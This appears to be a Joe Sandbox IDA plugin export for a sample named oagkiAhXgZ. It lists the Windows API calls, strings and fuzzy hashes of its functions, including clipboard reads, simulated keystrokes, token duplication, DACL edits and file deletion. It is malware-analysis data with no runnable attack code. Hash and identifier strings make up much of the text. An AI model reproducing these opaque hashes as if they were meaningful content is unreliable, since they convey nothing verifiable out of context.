GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00B3969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B396C9
SendMessageW.USER32 ref: 00B396F2
GetKeyState.USER32(00000011), ref: 00B3978B
GetKeyState.USER32(00000009), ref: 00B39798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00B397AE
GetKeyState.USER32(00000010), ref: 00B397B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00B397E9
SendMessageW.USER32 ref: 00B39810
SendMessageW.USER32(?,00001030,?,00B37E95), ref: 00B39918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00B3992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00B39941
SetCapture.USER32(?), ref: 00B3994A
ClientToScreen.USER32(?,?), ref: 00B399AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00B399BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B399D6
ReleaseCapture.USER32 ref: 00B399E1
GetCursorPos.USER32(?), ref: 00B39A19
ScreenToClient.USER32(?,?), ref: 00B39A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39A80
SendMessageW.USER32 ref: 00B39AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39AEB
SendMessageW.USER32 ref: 00B39B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00B39B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00B39B4A
GetCursorPos.USER32(?), ref: 00B39B68
ScreenToClient.USER32(?,?), ref: 00B39B75
GetParent.USER32(?), ref: 00B39B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00B39BFA
SendMessageW.USER32 ref: 00B39C2B
ClientToScreen.USER32(?,?), ref: 00B39C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00B39CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00B39CDE
SendMessageW.USER32 ref: 00B39D01
ClientToScreen.USER32(?,?), ref: 00B39D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00B39D82

Part of subcall function 00AB9944: GetWindowLongW.USER32(?,000000EB), ref: 00AB9952

GetWindowLongW.USER32(?,000000F0), ref: 00B39E05

Strings

@GUI_DRAGID, xrefs: 00B3997D
F, xrefs: 00B39D07

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
Instruction ID: dbb477afe34253343f62d149f19634092739e28b03276c2ccfd383f34802b72d
Opcode Fuzzy Hash: 80ee514ff5d2a293b78d44dedbe9e60dd3d409b32e255038066a14ea020d42d7
Instruction Fuzzy Hash: DE42BF35205200AFD724CF68CC85EAABBE5FF49310F204A99F699972A1DBB1EC51CF51

Function 00B34873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00B348F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00B34908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00B34927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00B3494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00B3495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00B3497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00B349AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00B349D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00B34A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00B34A7E
IsMenu.USER32(?), ref: 00B34A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B34B20
GetWindowLongW.USER32(?,000000F0), ref: 00B34B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00B34BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00B34C82
wsprintfW.USER32 ref: 00B34CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B34D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B34D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00B34D5A

Strings

%d/%02d/%02d, xrefs: 00B34CA8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 69fbd614af71dc13c2e92aba1b6fc8de077870b19fec130f1dd47c800d508f28
Instruction ID: b5613af745f495406dfbcc245f6b6b8cd2850b58f0ff1dca3ee4133fbdaf599e
Opcode Fuzzy Hash: 69fbd614af71dc13c2e92aba1b6fc8de077870b19fec130f1dd47c800d508f28
Instruction Fuzzy Hash: F912D271500214AFEB258F68CC4AFAE7BF8EF45710F2441A9F519EB2E1DB74A941CB50

Function 00ABF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00ABF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AFF474
IsIconic.USER32(00000000), ref: 00AFF47D
ShowWindow.USER32(00000000,00000009), ref: 00AFF48A
SetForegroundWindow.USER32(00000000), ref: 00AFF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4AA
GetCurrentThreadId.KERNEL32 ref: 00AFF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00AFF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00AFF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00AFF4DE
SetForegroundWindow.USER32(00000000), ref: 00AFF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF4F6
keybd_event.USER32(00000012,00000000), ref: 00AFF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF50B
keybd_event.USER32(00000012,00000000), ref: 00AFF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF519
keybd_event.USER32(00000012,00000000), ref: 00AFF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AFF528
keybd_event.USER32(00000012,00000000), ref: 00AFF52D
SetForegroundWindow.USER32(00000000), ref: 00AFF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00AFF557

Strings

Shell_TrayWnd, xrefs: 00AFF46F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
Instruction ID: 1f49d933e0855748c16b2053f64349c035ccdba996537f1d856b694d5e4f887f
Opcode Fuzzy Hash: c0270f82290bf691b284aa707ab20f76f54cbdea3540c201349bb9ca128c17a9
Instruction Fuzzy Hash: 09310E71A80218BEEB216BF55C4AFBF7E6CEB44B50F210065FA01F7191CBB19D00AB60

Function 00B01201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00B016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B0170D
Part of subcall function 00B016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B0173A
Part of subcall function 00B016C3: GetLastError.KERNEL32 ref: 00B0174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00B01286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00B012A8
CloseHandle.KERNEL32(?), ref: 00B012B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B012D1
GetProcessWindowStation.USER32 ref: 00B012EA
SetProcessWindowStation.USER32(00000000), ref: 00B012F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B01310

Part of subcall function 00B010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B011FC), ref: 00B010D4
Part of subcall function 00B010BF: CloseHandle.KERNEL32(?,?,00B011FC), ref: 00B010E9

Strings

winsta0, xrefs: 00B012CC
, xrefs: 00B0125A
default, xrefs: 00B0130B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: d34541595003b1b46da6fa807da6b557c6e07174bef0b93553a63a9eb3bee7b9
Instruction ID: 4ff99b4ba39a1565f44688b0a8d81fdc6e7f27989c8a3761d65021250e61f383
Opcode Fuzzy Hash: d34541595003b1b46da6fa807da6b557c6e07174bef0b93553a63a9eb3bee7b9
Instruction Fuzzy Hash: 0F817871900209AFDF259FA8DC49BEE7FB9EF04704F2445A9F910B62A0DB758954CF20

Function 00B00B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B01114
Part of subcall function 00B010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01120
Part of subcall function 00B010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B0112F
Part of subcall function 00B010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B00B9B,?,?,?), ref: 00B01136
Part of subcall function 00B010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B0114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B00BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B00C00
GetLengthSid.ADVAPI32(?), ref: 00B00C17
GetAce.ADVAPI32(?,00000000,?), ref: 00B00C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B00C6D
GetLengthSid.ADVAPI32(?), ref: 00B00C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00B00C8C
HeapAlloc.KERNEL32(00000000), ref: 00B00C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B00CB4
CopySid.ADVAPI32(00000000), ref: 00B00CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B00CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B00D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B00D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D45
HeapFree.KERNEL32(00000000), ref: 00B00D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D55
HeapFree.KERNEL32(00000000), ref: 00B00D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B00D65
HeapFree.KERNEL32(00000000), ref: 00B00D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 00B00D78
HeapFree.KERNEL32(00000000), ref: 00B00D7F

Part of subcall function 00B01193: GetProcessHeap.KERNEL32(00000008,00B00BB1,?,00000000,?,00B00BB1,?), ref: 00B011A1
Part of subcall function 00B01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00B00BB1,?), ref: 00B011A8
Part of subcall function 00B01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00B00BB1,?), ref: 00B011B7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
Instruction ID: 4d50d429bfe5d848da772d6910756e32481216c547c2c76bedaa8a53be175eac
Opcode Fuzzy Hash: 6c086fd436f401391da3b03e2f24f3a93e8bc76d8cf2fb0146c78bb73aeb7e9e
Instruction Fuzzy Hash: 3071397690020AABDF10AFE4DC44BAEBFB9FF04310F2446A5E915B7191DB75AA05CB70

Function 00B1EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00B3CC08), ref: 00B1EB29
IsClipboardFormatAvailable.USER32(0000000D), ref: 00B1EB37
GetClipboardData.USER32(0000000D), ref: 00B1EB43
CloseClipboard.USER32 ref: 00B1EB4F
GlobalLock.KERNEL32(00000000), ref: 00B1EB87
CloseClipboard.USER32 ref: 00B1EB91
GlobalUnlock.KERNEL32(00000000), ref: 00B1EBBC
IsClipboardFormatAvailable.USER32(00000001), ref: 00B1EBC9
GetClipboardData.USER32(00000001), ref: 00B1EBD1
GlobalLock.KERNEL32(00000000), ref: 00B1EBE2
GlobalUnlock.KERNEL32(00000000), ref: 00B1EC22
IsClipboardFormatAvailable.USER32(0000000F), ref: 00B1EC38
GetClipboardData.USER32(0000000F), ref: 00B1EC44
GlobalLock.KERNEL32(00000000), ref: 00B1EC55
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00B1EC77
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1EC94
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00B1ECD2
GlobalUnlock.KERNEL32(00000000), ref: 00B1ECF3
CountClipboardFormats.USER32 ref: 00B1ED14
CloseClipboard.USER32 ref: 00B1ED59

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
Instruction ID: aef3357d39cd8f425e6bee8d968c6ef45379f779a1ad51d8b5c1c0a631f8285f
Opcode Fuzzy Hash: 30540a1e97000d26b9cf4d8399301fdb681187a870e9d92c0f134023c57689cc
Instruction Fuzzy Hash: F561D1352042019FD300EF64D889FAABBE4EF85714F58459DF866972A1CF31DD89CB62

Function 00B1698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B169BE
FindClose.KERNEL32(00000000), ref: 00B16A12
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A4E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B16A75

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16AB2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B16ADF

Strings

%4d, xrefs: 00B16BB1
%02d, xrefs: 00B16C00, 00B16C0A, 00B16C5A, 00B16CAA, 00B16CFA, 00B16D4A
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00B16B32
%4d%02d%02d%02d%02d%02d, xrefs: 00B16B6A
%03d, xrefs: 00B16DA2

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
Instruction ID: 6f37de1d9cea6084673464be9431da94fbdbb62cb53a7e6ab5c1ebcc03f0c958
Opcode Fuzzy Hash: 4028da5e048926e51d0734a6cae98245cad313ad8dbde8794ee842c8697122b6
Instruction Fuzzy Hash: 19D14D72508300AEC714EBA4CD82EAFB7ECAF89704F44495DF589D7191EB74DA44CB62

Function 00B19642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B19663
GetFileAttributesW.KERNEL32(?), ref: 00B196A1
SetFileAttributesW.KERNEL32(?,?), ref: 00B196BB
FindNextFileW.KERNEL32(00000000,?), ref: 00B196D3
FindClose.KERNEL32(00000000), ref: 00B196DE
FindFirstFileW.KERNEL32(*.*,?), ref: 00B196FA
SetCurrentDirectoryW.KERNEL32(?), ref: 00B1974A
SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B19768
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B19772
FindClose.KERNEL32(00000000), ref: 00B1977F
FindClose.KERNEL32(00000000), ref: 00B1978F

Strings

*.*, xrefs: 00B196F5

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
Instruction ID: 135f7a577104f8ffb9f046c5d5a9a671983129dfddc80e4c17a180d43697f195
Opcode Fuzzy Hash: f5a22021658a313e73e0bb0bfc2b78090c85982b245665379fed58100a5e134a
Instruction Fuzzy Hash: D331A032540259AADB14AFF4DC59ADE7BECEF09320F644195F815E30E0DB34DE848B64

Function 00B1979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B197BE
FindNextFileW.KERNEL32(00000000,?), ref: 00B19819
FindClose.KERNEL32(00000000), ref: 00B19824
FindFirstFileW.KERNEL32(*.*,?), ref: 00B19840
SetCurrentDirectoryW.KERNEL32(?), ref: 00B19890
SetCurrentDirectoryW.KERNEL32(00B66B7C), ref: 00B198AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B198B8
FindClose.KERNEL32(00000000), ref: 00B198C5
FindClose.KERNEL32(00000000), ref: 00B198D5

Part of subcall function 00B0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B0DB00

Strings

*.*, xrefs: 00B1983B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
Instruction ID: 6aacb86cff4e30b42c572f21aac517bd0d4ac6255e11674fe6e76f47f62a1053
Opcode Fuzzy Hash: 5efaf9fdcfbe3d99f43a28fc1910b36ef830c9818cfdf9b49662896fe2b0d8d3
Instruction Fuzzy Hash: 0A31B232540659AADB14AFB4DC59ADE7BECEF06360F6441A5F814A30E0DB30D9858B64

Function 00B18195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00B18257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B18267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B18273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B18310
SetCurrentDirectoryW.KERNEL32(?), ref: 00B18324
SetCurrentDirectoryW.KERNEL32(?), ref: 00B18356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B1838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00B18395

Strings

*.*, xrefs: 00B1839B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
Instruction ID: fcdd8be76debd1d10b72597b7a4f3a211f0e307830f744f09ccb6ad029fbacf2
Opcode Fuzzy Hash: 000798120dfae5a995e1357b9b35f6b85fcca76af0153e45d624bcef287bfa64
Instruction Fuzzy Hash: 86618A725043059FCB10EF60D8809AFB3E8FF8A310F44896EF99993291DB31E945CB92

Function 00B0D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2

Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A

FindFirstFileW.KERNEL32(?,?), ref: 00B0D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00B0D1DD
MoveFileW.KERNEL32(?,?), ref: 00B0D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 00B0D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B0D237

Part of subcall function 00B0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00B0D21C,?,?), ref: 00B0D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 00B0D253
FindClose.KERNEL32(00000000), ref: 00B0D264

Strings

\*.*, xrefs: 00B0D0CD, 00B0D0D6, 00B0D0EB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
